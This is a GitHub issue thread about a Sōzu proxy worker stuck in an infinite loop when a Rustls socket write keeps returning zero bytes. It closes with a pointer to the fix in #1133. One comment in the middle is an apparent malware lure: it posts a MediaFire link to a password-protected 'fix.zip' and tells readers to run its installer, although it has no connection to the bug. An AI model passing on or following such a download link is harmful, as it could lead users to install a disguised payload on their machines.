### ISSUE TITLE
Worker hang up in an infinite loop, to be researched

### ISSUE THREAD

**Issue by Keksoj** [sozu-proxy/sozu#1132]
In production, we have witnessed a Sōzu worker becoming irresponsive, and when investigating, we found it was stuck in an infinite loop.

To the best of our understanding, this loop is stuck:

https://github.com/sozu-proxy/sozu/blob/409af59b223dfec2cf2b19c9e71c5946016fc0d4/lib/src/protocol/pipe.rs#L428-L458

The Rustls pipeline went through, but writing on the socket failed.

`self.frontend.socket_write()` is dispatched on a Rustls session, and the retured tuple `(current_sz, current_res)` has always the value `(0, SocketResult::Continue)`.

`current_sz` should have non-zero value, or some retry should take place, or some status should be logged.

The result sent by Rustls may be misunderstood and should be better investigated.

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Keksoj** [comment]
solved by #1133
